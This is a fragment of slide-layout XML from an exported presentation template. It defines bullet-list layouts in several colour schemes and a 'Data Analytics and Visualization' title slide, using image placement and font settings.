          <p:cNvPr id="679" name="Google Shape;679;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>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36. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 680"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p37"/>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3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3" name="Google Shape;683;p3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84" name="Google Shape;684;p3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85" name="Google Shape;685;p3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86" name="Google Shape;686;p3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87" name="Google Shape;687;p3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8" name="Google Shape;688;p37"/>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9" name="Google Shape;689;p37"/>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37"/>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37"/>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37"/>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37"/>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37"/>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5" name="Google Shape;695;p37"/>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6" name="Google Shape;696;p37"/>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7" name="Google Shape;697;p37"/>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8" name="Google Shape;698;p37"/>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99" name="Google Shape;699;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="700" name="Google Shape;700;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="701" name="Google Shape;701;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="702" name="Google Shape;702;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="703" name="Google Shape;703;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="704" name="Google Shape;704;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577804"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37. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 705"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p38"/>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3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08" name="Google Shape;708;p3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09" name="Google Shape;709;p3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10" name="Google Shape;710;p3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11" name="Google Shape;711;p3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12" name="Google Shape;712;p3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3" name="Google Shape;713;p38"/>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4" name="Google Shape;714;p38"/>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38"/>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38"/>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38"/>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38"/>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38"/>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0" name="Google Shape;720;p38"/>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1" name="Google Shape;721;p38"/>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2" name="Google Shape;722;p38"/>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3" name="Google Shape;723;p38"/>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24" name="Google Shape;724;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="725" name="Google Shape;725;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="726" name="Google Shape;726;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="727" name="Google Shape;727;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="728" name="Google Shape;728;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="729" name="Google Shape;729;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>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38. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 730"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Google Shape;731;p39"/>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3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33" name="Google Shape;733;p3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34" name="Google Shape;734;p3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35" name="Google Shape;735;p3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36" name="Google Shape;736;p3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37" name="Google Shape;737;p3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38" name="Google Shape;738;p39"/>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39" name="Google Shape;739;p39"/>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39"/>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39"/>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39"/>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39"/>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39"/>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5" name="Google Shape;745;p39"/>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6" name="Google Shape;746;p39"/>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7" name="Google Shape;747;p39"/>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8" name="Google Shape;748;p39"/>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49" name="Google Shape;749;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="750" name="Google Shape;750;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="751" name="Google Shape;751;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="752" name="Google Shape;752;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="753" name="Google Shape;753;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="754" name="Google Shape;754;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>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39. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 755"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756" name="Google Shape;756;p40"/>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4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58" name="Google Shape;758;p4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59" name="Google Shape;759;p4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60" name="Google Shape;760;p4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61" name="Google Shape;761;p4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62" name="Google Shape;762;p4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3" name="Google Shape;763;p40"/>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4" name="Google Shape;764;p40"/>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40"/>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6" name="Google Shape;766;p40"/>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40"/>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8" name="Google Shape;768;p40"/>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40"/>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70" name="Google Shape;770;p40"/>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40"/>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72" name="Google Shape;772;p40"/>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40"/>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74" name="Google Shape;774;p40"/>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40"/>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76" name="Google Shape;776;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="777" name="Google Shape;777;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="778" name="Google Shape;778;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="779" name="Google Shape;779;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="780" name="Google Shape;780;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="781" name="Google Shape;781;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1390"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="782" name="Google Shape;782;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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4. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;38;p5"/>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39" name="Google Shape;39;p5"/>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0" name="Google Shape;40;p5"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Google Shape;41;p5"/>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42" name="Google Shape;42;p5"/>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Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;43;p5"/>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4" name="Google Shape;44;p5"/>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 name="Google Shape;45;p5"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p5"/>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40. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 783"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="Google Shape;784;p41"/>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4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86" name="Google Shape;786;p4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87" name="Google Shape;787;p4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88" name="Google Shape;788;p4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89" name="Google Shape;789;p4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90" name="Google Shape;790;p4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1" name="Google Shape;791;p41"/>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2" name="Google Shape;792;p41"/>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41"/>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4" name="Google Shape;794;p41"/>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41"/>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6" name="Google Shape;796;p41"/>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41"/>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8" name="Google Shape;798;p41"/>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41"/>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00" name="Google Shape;800;p41"/>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41"/>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02" name="Google Shape;802;p41"/>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41"/>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04" name="Google Shape;804;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="805" name="Google Shape;805;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="806" name="Google Shape;806;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Google Shape;807;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="808" name="Google Shape;808;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="809" name="Google Shape;809;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520979" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="810" name="Google Shape;810;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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41. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 811"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="Google Shape;812;p42"/>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4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14" name="Google Shape;814;p4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15" name="Google Shape;815;p4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816" name="Google Shape;816;p4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817" name="Google Shape;817;p4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18" name="Google Shape;818;p4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19" name="Google Shape;819;p42"/>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0" name="Google Shape;820;p42"/>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42"/>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2" name="Google Shape;822;p42"/>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42"/>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4" name="Google Shape;824;p42"/>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42"/>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6" name="Google Shape;826;p42"/>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42"/>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8" name="Google Shape;828;p42"/>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42"/>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30" name="Google Shape;830;p42"/>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42"/>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32" name="Google Shape;832;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="833" name="Google Shape;833;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
